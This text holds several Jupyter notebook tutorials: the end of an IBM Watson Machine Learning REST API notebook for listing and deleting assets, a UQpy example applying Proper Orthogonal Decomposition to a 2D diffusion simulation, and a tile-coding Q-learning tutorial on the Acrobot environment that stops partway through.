print(f'Failed to delete pipeline: \n {pipeline_delete.json()}') ``` If you want to delete more pipelines run following cell. ``` for pipeline in pipelines_details.json()['resources']: pipeline_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/pipelines/{pipeline['metadata']['id']}?version=2020-08-01&space_id={space_id}", headers = header ) if pipeline_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete pipeline: \n {pipeline_delete.json()}') ``` <a id="model_definitions"></a> ## 3. Manage model definitions If you want to get all model definitions details you can run following REST API call. If you want to get part of model definitions please change the `limit` variable. ``` limit=2 model_definitions_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/model_definitions?version=2020-08-01&space_id={space_id}&limit={limit}", headers = header ) ``` If you want to list existing model definitions names and ids run next cell. ``` for model_definition in model_definitions_details.json()['resources']: print(f"{model_definition['metadata']['name']} \t Id: {model_definition['metadata']['id']}") ``` Get model definition 0 id. ``` model_definition_id = model_definitions_details.json()['resources'][0]['metadata']['id'] print(model_definition_id) ``` If you want to get model definition details you must provide `model_definition_id` and run following REST API call. ``` model_definition_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/model_definitions/{model_definition_id}?version=2020-08-01&space_id={space_id}", headers = header ) ``` Print model definition details. ``` model_definition_details.json() ``` You can delete model definition by next cell API CALL. ``` model_definition_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/model_definitions/{model_definition_id}?version=2020-08-01&space_id={space_id}", headers = header ) if model_definition_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete model definition: \n {model_definition_delete.json()}') ``` If you want to delete more model definitions run following cell. ``` for model_definition in model_definitions_details.json()['resources']: model_definition_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/model_definitions/{model_definition['metadata']['id']}?version=2020-08-01&space_id={space_id}", headers = header ) if model_definition_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete model definition: \n {model_definition_delete.json()}') ``` <a id="models"></a> ## 4. Manage models If you want to get all models details you can run following REST API call. If you want to get part of models please change the `limit` variable. ``` limit=2 models_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/models?version=2020-08-01&space_id={space_id}&limit={limit}", headers = header ) ``` In order to filter models by software specification you can paste software specification id to the `software_spec` field. ``` limit=2 software_spec="63dc4cf1-252f-424b-b52d-5cdd9814987f" models_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/models?version=2020-08-01&space_id={space_id}&limit={limit}&software_spec={software_spec}", headers = header ) ``` If you want to list existing models names and ids run next cell. ``` for model in models_details.json()['resources']: print(f"{model['metadata']['name']} \t Id: {model['metadata']['id']}") ``` Get model 0 id. ``` model_id = models_details.json()['resources'][0]['metadata']['id'] print(model_id) ``` If you want to get model details you must provide `model_id` and run following REST API call. ``` model_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/models/{model_id}?version=2020-08-01&space_id={space_id}", headers = header ) ``` Print model details. ``` model_details.json() ``` If you want to get model revision you must provide `model_id` and run following REST API call. ``` model_revisons = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/models/{model_id}/revisions?version=2020-08-01&space_id={space_id}", headers = header ) ``` Print model revision. ``` model_revisons.json() ``` You can delete model by next cell API CALL. ``` model_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/models/{model_id}?version=2020-08-01&space_id={space_id}", headers = header ) if model_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete model: \n {model_delete.json()}') ``` If you want to delete more models run following cell. ``` for model in models_details.json()['resources']: model_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/models/{model['metadata']['id']}?version=2020-08-01&space_id={space_id}", headers = header ) if model_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete model: \n {model_delete.json()}') ``` <a id="functions"></a> ## 5. Manage functions If you want to get all functions details you can run following REST API call. If you want to get part of functions please change the `limit` variable. ``` limit=2 functions_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/functions?version=2020-08-01&space_id={space_id}&limit={limit}", headers = header ) ``` If you want to list existing functions names and ids run next cell. ``` for function in functions_details.json()['resources']: print(f"{function['metadata']['name']} \t Id: {function['metadata']['id']}") ``` Get function 0 id. ``` function_id = functions_details.json()['resources'][0]['metadata']['id'] print(function_id) ``` If you want to get function details you must provide `function_id` and run following REST API call. ``` function_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/functions/{function_id}?version=2020-08-01&space_id={space_id}", headers = header ) ``` Print function details. ``` function_details.json() ``` You can delete function by next cell API CALL. ``` function_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/functions/{function_id}?version=2020-08-01&space_id={space_id}", headers = header ) if function_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete function: \n {function_delete.json()}') ``` If you want to delete more functions run following cell. ``` for function in functions_details.json()['resources']: function_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/functions/{function['metadata']['id']}?version=2020-08-01&space_id={space_id}", headers = header ) if function_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete function: \n {function_delete.json()}') ``` <a id="experiments"></a> ## 6. Manage experiments If you want to get all experiments details you can run following REST API call. If you want to get part of experiments please change the `limit` variable. ``` limit=2 experiments_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/experiments?version=2020-08-01&space_id={space_id}", headers = header ) ``` If you want to list existing experiments names and ids run next cell. ``` for experiment in experiments_details.json()['resources']: print(f"{experiment['metadata']['name']} \t Id: {experiment['metadata']['id']}") ``` Get experiment 0 id. ``` experiment_id = experiments_details.json()['resources'][0]['metadata']['id'] print(experiment_id) ``` If you want to get experiment details you must provide `experiment_id` and run following REST API call. ``` experiment_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/experiments/{experiment_id}?version=2020-08-01&space_id={space_id}", headers = header ) ``` Print experiment details. ``` experiment_details.json() ``` You can delete experiment by next cell API CALL. ``` experiment_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/experiments/{experiment_id}?version=2020-08-01&space_id={space_id}", headers = header ) if experiment_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete experiment: \n {experiment_delete.json()}') ``` If you want to delete more experiments change run following cell. ``` for experiment in experiments_details.json()['resources']: experiment_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/experiments/{experiment['metadata']['id']}?version=2020-08-01&space_id={space_id}", headers = header ) if experiment_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete experiment: \n {experiment_delete.json()}') ``` <a id="trainings"></a> ## 7. Manage trainings If you want to get all trainings details you can run following REST API call. If you want to get part of trainings please change the `limit` variable. ``` limit=2 trainings_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/trainings?version=2020-08-01&space_id={space_id}&limit={limit}", headers = header ) ``` In order to filter trainings by the training type (e.g. pipeline, experiment) please change `training_type` variable and run next cell. ``` limit=2 training_type='pipeline' trainings_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/trainings?version=2020-08-01&space_id={space_id}&limit={limit}&type={training_type}", headers = header ) ``` If you want to list existing trainings tags and ids run next cell. ``` for training in trainings_details.json()['resources']: print(f"{training['metadata']['tags']} \t Id: {training['metadata']['id']}") ``` Get training 0 id. ``` training_id = trainings_details.json()['resources'][0]['metadata']['id'] print(training_id) ``` If you want to get training details you must provide `training_id` and run following REST API call. ``` training_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/trainings/{training_id}?version=2020-08-01&space_id={space_id}", headers = header ) ``` Print training details. ``` training_details.json() ``` You can delete training by next cell API CALL. **Note:** `DELETE` CALL has parameter `hard_delete`, please change it as fallows: - 'true' - to delete the completed or canceled training runs. - 'false' - to cancel the currently running training run. ``` hard_delete = 'true' training_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/trainings/{training_id}?version=2020-08-01&space_id={space_id}&hard_delete={hard_delete}", headers = header ) if training_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete training: \n {training_delete.json()}') ``` <a id="deployments"></a> ## 8. Manage deployments If you want to get all deployments details you can run following REST API call. If you want to get part of deployments please change the `limit` variable. ``` limit=2 deployments_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/deployments?version=2020-08-01&space_id={space_id}&limit={limit}", headers = header ) ``` If you want to list existing deployments names and ids run next cell. ``` for deployment in deployments_details.json()['resources']: print(f"{deployment['metadata']['name']} \t Id: {deployment['metadata']['id']}") ``` Get deployment 0 id. ``` deployment_id = deployments_details.json()['resources'][0]['metadata']['id'] print(deployment_id) ``` If you want to get deployment details you must provide `deployment_id` and run following REST API call. ``` deployment_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/deployments/{deployment_id}?version=2020-08-01&space_id={space_id}", headers = header ) ``` Print deployment details. ``` deployment_details.json() ``` You can delete deployment by next cell API CALL. ``` deployment_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/deployments/{deployment_id}?version=2020-08-01&space_id={space_id}", headers = header ) if deployment_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete deployment: \n {deployment_delete.json()}') ``` If you want to delete more deployments run following cell. ``` for deployment in deployments_details.json()['resources']: deployment_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/deployments/{deployment['metadata']['id']}?version=2020-08-01&space_id={space_id}", headers = header ) if deployment_delete.status_code in [200,202,204]: print('SUCCES') else: print(f'Failed to delete deployment: \n {deployment_delete.json()}') ``` <a id="summary"></a> ## 9. Summary and next steps You successfully completed this notebook! You learned how to use REST API client for Watson Machine Learning instance management and clean up. Check out our _[Online Documentation](https://dataplatform.cloud.ibm.com/docs/content/wsj/getting-started/welcome-main.html?context=analytics?pos=2)_ for more samples, tutorials, documentation, how-tos, and blog posts. ### Authors **Szymon Kucharczyk**, Software Engineer at IBM. Copyright © 2020, 2021 IBM. This notebook and its source code are released under the terms of the MIT License.
github_jupyter
# Proper Orthogonal Decomposition Example 2 Author: Katiana Kontolati \ Date: August 27, 2020 In this example, the diffusion equation is solved and then methods from the POD class are used to decompose the output solutions/dataset and extract its basis functions which can be used for the reconstruction of the solution. ## 2D Diffusion equation > $\displaystyle \frac{\partial U}{\partial t} = D \bigg(\frac{\partial^2 U}{\partial x^2} + \frac{\partial^2 U}{\partial y^2}\bigg)$ > <br> > <br> > where $D$ is the diffusion coefficient. $U$ describes the behavior of the particles in Brownian motion, resulting from their random movements and collisions. <img src="plate_and_disc.png" alt="plate_and_disc.png" height="160" width="160" align=right> ### Problem description: > - A 2D metal plate is initially at temperature $T_{cool}$. > - A disc of a specified size inside the plate is at temperature $T_{hot}$. > - Suppose that the edges of the plate are held fixed at $T_{cool}$. > - The diffusion equation is applied to follow the evolution of the temperature of the plate. Import the necessary libraries. Here we import standard libraries such as numpy, matplotlib, and we also import the POD class from UQpy. ``` import numpy as np import matplotlib.pyplot as plt from UQpy.DimensionReduction import DirectPOD, SnapshotPOD, HOSVD from DiffusionEquation import diffusion import time ``` The diffusion equation is solved by calling the 'diffusion' function and a dataset (list) is obtained. To run this function the following need to be specified: > - w, h - Plate size, mm > - dx, dy - Intervals in x-, y- directions, mm > - D - Thermal diffusivity, mm2.s-1 > - Tcool, Thot - Plate and disc temperature > - r, cx, cy - Initial conditions - ring of inner radius r, width dr centred at (cx,cy) (mm) > - nsteps - Number of time steps ``` w = h = 5. dx, dy = 0.1, 0.1 D = 5 Tcool, Thot = 400, 700 r, cx, cy = 1.5, 2.5, 2.5 nsteps = 500 Data = diffusion(w, h, dx, dy, D, Tcool, Thot, r, cx, cy, nsteps) ``` The Direct POD method is used to reconstruct the data for different values of spatial modes. Full reconstruction is achieved when the number of modes chosen equals the number of dimensions. Since the dataset for this problem is large, the Snapshot POD is recommended as the decomposition will be performed much faster. ``` start_time = time.time() n_modes = [1, 2, 3, 4, 40, 50] frame = 40 Data_modes = [] for i in range(len(n_modes)): pod = DirectPOD(input_sol=Data, modes=n_modes[i], verbose=False) Data_reconstr, Data_reduced = pod.run() Data_modes.append(Data_reconstr[:,:,frame]) del Data_reconstr elapsed_time = time.time() - start_time time.strftime("%H:%M:%S", time.gmtime(elapsed_time)) print('Elapsed time: ', elapsed_time) ``` Comparison of input and reduced solution. ``` # Plot input solution plt.figure(figsize = (16,2.5)) c = plt.imshow(Data[frame], cmap=plt.get_cmap('coolwarm'), vmin=Tcool,vmax=Thot) plt.colorbar(c) plt.title('Input solution',fontweight ="bold",size=15) plt.show() # Plot reduced solution fig = plt.figure(figsize=(10,7)) fig.subplots_adjust(hspace=0.5, wspace=0.4) for i in range(len(n_modes)): ax = fig.add_subplot(2, 3, i+1) im = ax.imshow(Data_modes[i], cmap=plt.get_cmap('coolwarm'), vmin=Tcool,vmax=Thot) ax.set_axis_off() ax.set_title('Mode {}'.format(n_modes[i]),size=15) fig.subplots_adjust(right=0.85) cbar_ax = fig.add_axes([0.9, 0.15, 0.03, 0.7]) cbar_ax.set_xlabel('$T$ / K', labelpad=20) fig.colorbar(im, cax=cbar_ax) fig.suptitle('Reconstructed solution',fontweight="bold",size=15) plt.show() ```
github_jupyter
# Tile Coding --- Tile coding is an innovative way of discretizing a continuous space that enables better generalization compared to a single grid-based approach. The fundamental idea is to create several overlapping grids or _tilings_; then for any given sample value, you need only check which tiles it lies in. You can then encode the original continuous value by a vector of integer indices or bits that identifies each activated tile. ### 1. Import the Necessary Packages ``` # Import common libraries import sys import gym import numpy as np import matplotlib.pyplot as plt import pandas as pd import time import copy # Set plotting options %matplotlib inline plt.style.use('ggplot') np.set_printoptions(precision=3, linewidth=120) ``` ### 2. Specify the Environment, and Explore the State and Action Spaces We'll use [OpenAI Gym](https://gym.openai.com/) environments to test and develop our algorithms. These simulate a variety of classic as well as contemporary reinforcement learning tasks. Let's begin with an environment that has a continuous state space, but a discrete action space. ``` # Create an environment env = gym.make('Acrobot-v1') env.seed(505); # Explore state (observation) space print("State space:", env.observation_space) print("- low:", env.observation_space.low) print("- high:", env.observation_space.high) # Explore action space print("Action space:", env.action_space) state = env.reset() score = 0 start_time = time.time() n_steps = 0 while True: n_steps += 1 action = env.action_space.sample() env.render() state, reward, done, _ = env.step(action) score += reward if done: break print(n_steps, 'steps in', round(time.time() - start_time, 3), 'seconds') print('Final score:', score) env.close() ``` Note that the state space is multi-dimensional, with most dimensions ranging from -1 to 1 (positions of the two joints), while the final two dimensions have a larger range. How do we discretize such a space using tiles? ### 3. Tiling Let's first design a way to create a single tiling for a given state space. This is very similar to a uniform grid! The only difference is that you should include an offset for each dimension that shifts the split points. For instance, if `low = [-1.0, -5.0]`, `high = [1.0, 5.0]`, `bins = (10, 10)`, and `offsets = (-0.1, 0.5)`, then return a list of 2 NumPy arrays (2 dimensions) each containing the following split points (9 split points per dimension): ``` [array([-0.9, -0.7, -0.5, -0.3, -0.1, 0.1, 0.3, 0.5, 0.7]), array([-3.5, -2.5, -1.5, -0.5, 0.5, 1.5, 2.5, 3.5, 4.5])] ``` Notice how the split points for the first dimension are offset by `-0.1`, and for the second dimension are offset by `+0.5`. This might mean that some of our tiles, especially along the perimeter, are partially outside the valid state space, but that is unavoidable and harmless. ``` def create_tiling_grid(low, high, bins=(10, 10), offsets=(0.0, 0.0)): """Define a uniformly-spaced grid that can be used for tile-coding a space. Parameters ---------- low : array_like Lower bounds for each dimension of the continuous space. high : array_like Upper bounds for each dimension of the continuous space. bins : tuple Number of bins or tiles along each corresponding dimension. offsets : tuple Split points for each dimension should be offset by these values. Returns ------- grid : list of array_like A list of arrays containing split points for each dimension. """ assert len(low) == len(high) == len(bins) == len(offsets),\ "all lengths must match: given lengths are {}, {}, {}, {}".format(len(low), len(high), len(bins), len(offsets)) return [np.linspace(start=low[dim], stop=high[dim], num=bins[dim] + 1)[1:-1] + offsets[dim] for dim in range(len(bins))] low = [-1.0, -5.0] high = [1.0, 5.0] create_tiling_grid(low, high, bins=(10, 10), offsets=(-0.1, 0.5)) # [test] ``` You can now use this function to define a set of tilings that are a little offset from each other. ``` def create_tilings(low, high, tiling_specs): """Define multiple tilings using the provided specifications. Parameters ---------- low : array_like Lower bounds for each dimension of the continuous space. high : array_like Upper bounds for each dimension of the continuous space. tiling_specs : list of tuples A sequence of (bins, offsets) to be passed to create_tiling_grid(). Returns ------- tilings : list A list of tilings (grids), each produced by create_tiling_grid(). """ return [create_tiling_grid(low, high, bins, offsets) for bins, offsets in tiling_specs] # Tiling specs: [(<bins>, <offsets>), ...] tiling_specs = [((10, 10), (-0.066, -0.33)), ((10, 10), (0.0, 0.0)), ((10, 10), (0.066, 0.33))] tilings = create_tilings(low, high, tiling_specs) ``` It may be hard to gauge whether you are getting desired results or not. So let's try to visualize these tilings. ``` from matplotlib.lines import Line2D plt.rcParams['figure.facecolor'] = 'w' def visualize_tilings(tilings): """Plot each tiling as a grid.""" prop_cycle = plt.rcParams['axes.prop_cycle'] colors = prop_cycle.by_key()['color'] linestyles = ['-', '--', ':'] legend_lines = [] fig, ax = plt.subplots(figsize=(10, 10)) for i, grid in enumerate(tilings): for x in grid[0]: l = ax.axvline(x=x, color=colors[i % len(colors)], linestyle=linestyles[i % len(linestyles)], label=i) for y in grid[1]: l = ax.axhline(y=y, color=colors[i % len(colors)], linestyle=linestyles[i % len(linestyles)]) legend_lines.append(l) ax.grid(False) ax.legend(legend_lines, ["Tiling #{}".format(t) for t in range(len(legend_lines))], facecolor='white', framealpha=0.9) ax.set_title("Tilings") return ax # return Axis object to draw on later, if needed visualize_tilings(tilings); ``` Great! Now that we have a way to generate these tilings, we can next write our encoding function that will convert any given continuous state value to a discrete vector. ### 4. Tile Encoding Implement the following to produce a vector that contains the indices for each tile that the input state value belongs to. The shape of the vector can be the same as the arrangment of tiles you have, or it can be ultimately flattened for convenience. You can use the same `discretize()` function here from grid-based discretization, and simply call it for each tiling. ``` def discretize(sample, grid): """Discretize a sample as per given grid. Parameters ---------- sample : array_like A single sample from the (original) continuous space. grid : list of array_like A list of arrays containing split points for each dimension. Returns ------- discretized_sample : array_like A sequence of integers with the same number of dimensions as sample. """ return tuple(int(np.digitize(sample_point, corresponding_grid)) for sample_point, corresponding_grid in zip(sample, grid)) def tile_encode(sample, tilings, flatten=False): """Encode given sample using tile-coding. Parameters ---------- sample : array_like A single sample from the (original) continuous space. tilings : list A list of tilings (grids), each produced by create_tiling_grid(). flatten : bool If true, flatten the resulting binary arrays into a single long vector. Returns ------- encoded_sample : list or array_like A list of binary vectors, one for each tiling, or flattened into one. """ encoded_sample = [discretize(sample, grid) for grid in tilings] return np.concatenate(encoded_sample) if flatten else encoded_sample # Test with some sample values samples = [(-1.2 , -5.1 ), (-0.75, 3.25), (-0.5 , 0.0 ), ( 0.25, -1.9 ), ( 0.15, -1.75), ( 0.75, 2.5 ), ( 0.7 , -3.7 ), ( 1.0 , 5.0 )] encoded_samples = [tile_encode(sample, tilings) for sample in samples] print("\nSamples:", repr(samples), sep="\n") print("\nEncoded samples:", repr(encoded_samples), sep="\n") ``` Note that we did not flatten the encoding above, which is why each sample's representation is a pair of indices for each tiling. This makes it easy to visualize it using the tilings. ``` from matplotlib.patches import Rectangle def visualize_encoded_samples(samples, encoded_samples, tilings, low=None, high=None): """Visualize samples by activating the respective tiles.""" samples = np.array(samples) # for ease of indexing # Show tiling grids ax = visualize_tilings(tilings) # If bounds (low, high) are specified, use them to set axis limits if low is not None and high is not None: ax.set_xlim(low[0], high[0]) ax.set_ylim(low[1], high[1]) else: # Pre-render (invisible) samples to automatically set reasonable axis limits, and use them as (low, high) ax.plot(samples[:, 0], samples[:, 1], 'o', alpha=0.0) low = [ax.get_xlim()[0], ax.get_ylim()[0]] high = [ax.get_xlim()[1], ax.get_ylim()[1]] # Map each encoded sample (which is really a list of indices) to the corresponding tiles it belongs to tilings_extended = [np.hstack((np.array([low]).T, grid, np.array([high]).T)) for grid in tilings] # add low and high ends tile_centers = [(grid_extended[:, 1:] + grid_extended[:, :-1]) / 2 for grid_extended in tilings_extended] # compute center of each tile tile_toplefts = [grid_extended[:, :-1] for grid_extended in tilings_extended] # compute topleft of each tile tile_bottomrights = [grid_extended[:, 1:] for grid_extended in tilings_extended] # compute bottomright of each tile prop_cycle = plt.rcParams['axes.prop_cycle'] colors = prop_cycle.by_key()['color'] for sample, encoded_sample in zip(samples, encoded_samples): for i, tile in enumerate(encoded_sample): # Shade the entire tile with a rectangle topleft = tile_toplefts[i][0][tile[0]], tile_toplefts[i][1][tile[1]] bottomright = tile_bottomrights[i][0][tile[0]], tile_bottomrights[i][1][tile[1]] ax.add_patch(Rectangle(topleft, bottomright[0] - topleft[0], bottomright[1] - topleft[1], color=colors[i], alpha=0.33)) # In case sample is outside tile bounds, it may not have been highlighted properly if any(sample < topleft) or any(sample > bottomright): # So plot a point in the center of the tile and draw a connecting line cx, cy = tile_centers[i][0][tile[0]], tile_centers[i][1][tile[1]] ax.add_line(Line2D([sample[0], cx], [sample[1], cy], color=colors[i])) ax.plot(cx, cy, 's', color=colors[i]) # Finally, plot original samples ax.plot(samples[:, 0], samples[:, 1], 'o', color='r') ax.margins(x=0, y=0) # remove unnecessary margins ax.set_title("Tile-encoded samples") return ax visualize_encoded_samples(samples, encoded_samples, tilings); ``` Inspect the results and make sure you understand how the corresponding tiles are being chosen. Note that some samples may have one or more tiles in common. ### 5. Q-Table with Tile Coding The next step is to design a special Q-table that is able to utilize this tile coding scheme. It should have the same kind of interface as a regular table, i.e. given a `<state, action>` pair, it should return a `<value>`. Similarly, it should also allow you to update the `<value>` for a given `<state, action>` pair (note that this should update all the tiles that `<state>` belongs to). The `<state>` supplied here is assumed to be from the original continuous state space, and `<action>` is discrete (and integer index). The Q-table should internally convert the `<state>` to its tile-coded representation when required. ``` class QTable: """Simple Q-table.""" def __init__(self, state_size, action_size): """Initialize Q-table. Parameters ---------- state_size : tuple Number of discrete values along each dimension of state space. action_size : int Number of discrete actions in action space. """ self.state_size = state_size self.action_size = action_size self.q_table = np.zeros(state_size + (action_size,)) def __getitem__(self, key): return self.q_table[key] class TiledQTable: """Composite Q-table with an internal tile coding scheme.""" def __init__(self, low, high, tiling_specs, action_size): """Create tilings and initialize internal Q-table(s). Parameters ---------- low : array_like Lower bounds for each dimension of state space. high : array_like Upper bounds for each dimension of state space. tiling_specs : list of tuples A sequence of (bins, offsets) to be passed to create_tilings() along with low, high. action_size : int Number of discrete actions in action space. """ self.tilings = create_tilings(low, high, tiling_specs) self.state_sizes = [tuple(len(splits) + 1 for splits in tiling_grid) for tiling_grid in self.tilings] self.__first_indices = np.cumsum([0] + [np.prod(state_size) for state_size in self.state_sizes[:-1]]) self.__strides = np.array([tuple(np.prod(state_size[i:]) for i in range(1, len(state_size))) + (1,) for state_size in self.state_sizes]) self.action_size = action_size # self.q_tables = [QTable(state_size, self.action_size) for state_size in self.state_sizes] self.__flat_q_tables = np.zeros((self.__first_indices[-1] + np.prod(self.state_sizes[-1]), action_size)) @property def q_tables(self): start_ends = [tuple(self.__first_indices[i:i+2]) for i in range(len(self.__first_indices) - 1)] + [(self.__first_indices[-1], None)] return [self.__flat_q_tables[start_end[0]:start_end[1]].reshape(state_size + (self.action_size,)) for state_size, start_end in zip(self.state_sizes, start_ends)] @q_tables.setter def q_tables(self, q_tables): if isinstance(q_tables, (tuple, list)): if len(q_tables) == len(self.q_tables): for i, (old_q_table, new_q_table) in enumerate(zip(self.q_tables, new_q_table)): if old_q_table.shape != new_q_table.shape: raise RuntimeError("all Q tables must have the same dimensionality"\ "as the original ones: mismatch found in index {}"\ " - New {}, Old {}".format(i, new_q_table.shape, old_q_table.shape)) for old_q_table, new_q_table in zip(self.q_tables, new_q_table): old_q_table[:] = new_q_table else: if q_tables.shape != self.__flat_q_tables.shape: raise RuntimeError("the given Q table array must have the same dimensions as the "\ "original state-flattened Q table: given - {}, original - {}"\ .format(q_tables.shape, self.__flat_q_tables.shape)) self.__flat_q_tables = q_tables def get(self, state, action): """Get Q-value for given <state, action> pair. Parameters ---------- state : array_like Vector representing the state in the original continuous space. action : int Index of desired action. Returns ------- value : float Q-value of given <state, action> pair, averaged from all internal Q-tables. """ # tile_indices = tile_encode(state, self.tilings) # return np.mean([q_table.q_table[tile_idx] for q_table, tile_idx in zip(self.q_tables, tile_indices)]) state_indices = np.sum(tile_encode(state, self.tilings) * self.__strides, axis=1, keepdims=False) + self.__first_indices return np.mean(self.__flat_q_tables[state_indices, action]) def get_action_values(self, state): """Get all Q-values for given state. Parameters ---------- state : array_like Vector representing the state in the original continuous space. Returns ------- value : ndarray Q-values of given state, averaged from all internal Q-tables. """ state_indices = np.sum(tile_encode(state, self.tilings) * self.__strides, axis=1, keepdims=False) + self.__first_indices return np.mean(self.__flat_q_tables[state_indices], axis=0) def update(self, state, action, value, alpha=0.1): """Soft-update Q-value for given <state, action> pair to value. Instead of overwriting Q(state, action) with value, perform soft-update: Q(state, action) = alpha * value + (1.0 - alpha) * Q(state, action) Parameters ---------- state : array_like Vector representing the state in the original continuous space. action : int Index of desired action. value : float Desired Q-value for <state, action> pair. alpha : float Update factor to perform soft-update, in [0.0, 1.0] range. """ # tile_indices = tile_encode(state, self.tilings) # for q_table, tile_idx in zip(self.q_tables, tile_indices): # q_table.q_table[tile_idx] += alpha * (value - q_table.q_table[tile_idx]) state_indices = np.sum(tile_encode(state, self.tilings) * self.__strides, axis=1, keepdims=False) + self.__first_indices self.__flat_q_tables[state_indices, action] += alpha * (value - self.__flat_q_tables[state_indices, action]) # Test with a sample Q-table tq = TiledQTable(low, high, tiling_specs, 2) s1 = 3; s2 = 4; a = 0; q = 1.0 print("[GET] Q({}, {}) = {}".format(samples[s1], a, tq.get(samples[s1], a))) # check value at sample = s1, action = a print("[UPDATE] Q({}, {}) = {}".format(samples[s2], a, q)); tq.update(samples[s2], a, q) # update value for sample with some common tile(s) print("[GET] Q({}, {}) = {}".format(samples[s1], a, tq.get(samples[s1], a))) # check value again, should be slightly updated print(len(tq.q_tables)) print(*(q.shape for q in tq.q_tables)) ``` If you update the q-value for a particular state (say, `(0.25, -1.91)`) and action (say, `0`), then you should notice the q-value of a nearby state (e.g. `(0.15, -1.75)` and same action) has changed as well! This is how tile-coding is able to generalize values across the state space better than a single uniform grid. ### 6. Implement a Q-Learning Agent using Tile-Coding Now it's your turn to apply this discretization technique to design and test a complete learning agent! ``` class QLearningAgent: """Q-Learning agent that can act on a continuous state space by discretizing it.""" def __init__(self, env, tq, alpha=0.02, alpha_decay_rate=None, min_alpha=None, gamma=0.99, epsilon=1.0, epsilon_decay_rate=0.9995, min_epsilon=.01, seed=0): """Initialize variables, create grid for discretization.""" # Environment info self.env = env self.tq = tq self.state_sizes = tq.state_sizes # list of state sizes for each tiling self.action_size = self.env.action_space.n # 1-dimensional discrete action space self.seed = np.random.seed(seed) print("Environment:", self.env) print("State space sizes:", self.state_sizes) print("Action space size:", self.action_size) # Learning parameters self.alpha = self.initial_alpha = alpha # learning rate self.alpha_decay_rate = alpha_decay_rate if alpha_decay_rate else 1.0 self.min_alpha = min_alpha if min_alpha else 0. self.gamma = gamma # discount factor self.epsilon = self.initial_epsilon = epsilon # initial exploration rate self.epsilon_decay_rate = epsilon_decay_rate # how quickly should we decrease epsilon self.min_epsilon = min_epsilon def reset_episode(self, state): """Reset variables for a new episode.""" # Gradually decrease exploration rate self.epsilon *= self.epsilon_decay_rate self.epsilon = max(self.epsilon, self.min_epsilon) self.alpha *= self.alpha_decay_rate self.alpha = max(self.alpha, self.min_alpha) self.last_state = state # Q_s = [self.tq.get(state, action) for action in range(self.action_size)] Q_s = self.tq.get_action_values(state) self.last_action = np.argmax(Q_s) return self.last_action def reset_learning(self, alpha=None): """Reset learning rate used when training.""" self.alpha = alpha if alpha is not None else self.initial_alpha def reset_exploration(self, epsilon=None): """Reset exploration rate used when training.""" self.epsilon = epsilon if epsilon is not None else self.initial_epsilon def act(self, state, reward=None, done=None, mode='train'): """Pick next action and update internal Q table (when mode != 'test').""" # Q_s = [self.tq.get(state, action) for action in range(self.action_size)] Q_s = self.tq.get_action_values(state) # Pick the best action from Q table greedy_action = np.argmax(Q_s) if mode == 'test': # Test mode: Simply produce an action action = greedy_action else: # Train mode (default): Update Q table, pick next action # Note: We update the Q table entry for the *last* (state, action) pair with current state, reward value = reward + self.gamma * max(Q_s) self.tq.update(self.last_state, self.last_action, value, self.alpha) # Exploration vs. exploitation do_exploration = np.random.uniform(0, 1) < self.epsilon if do_exploration: # Pick a random action action = np.random.randint(0, self.action_size) else: # Pick the greedy action action = greedy_action # Roll over current state, action for next step self.last_state = state self.last_action = action return action n_bins = 15 bins = tuple([n_bins]*env.observation_space.shape[0]) offset_pos = (env.observation_space.high - env.observation_space.low)/(3*n_bins) tiling_specs = [(bins, -3 * offset_pos), (bins, -2 * offset_pos), (bins, -offset_pos), (bins, tuple([0.0]*env.observation_space.shape[0])), (bins, offset_pos), (bins, 2 * offset_pos), (bins, 3 * offset_pos)] tq = TiledQTable(env.observation_space.low, env.observation_space.high, tiling_specs, env.action_space.n) def get_decay_rate(initial, final, duration): return (final / initial) ** (1 / duration) initial_alpha = 0.05 final_alpha = 0.05 alpha_decay_duration = 300 alpha_decay_rate = get_decay_rate(initial_alpha, final_alpha, alpha_decay_duration) print("Alpha decay rate:", alpha_decay_rate) initial_epsilon = 1.0 final_epsilon = 0.001 epsilon_decay_duration = 30000 epsilon_decay_rate = get_decay_rate(initial_epsilon, final_epsilon, epsilon_decay_duration) print("Epsilon decay rate:", epsilon_decay_rate) agent = QLearningAgent(env, tq, alpha=initial_alpha, # 0.02 alpha_decay_rate=alpha_decay_rate, # None min_alpha=0.00001, # None 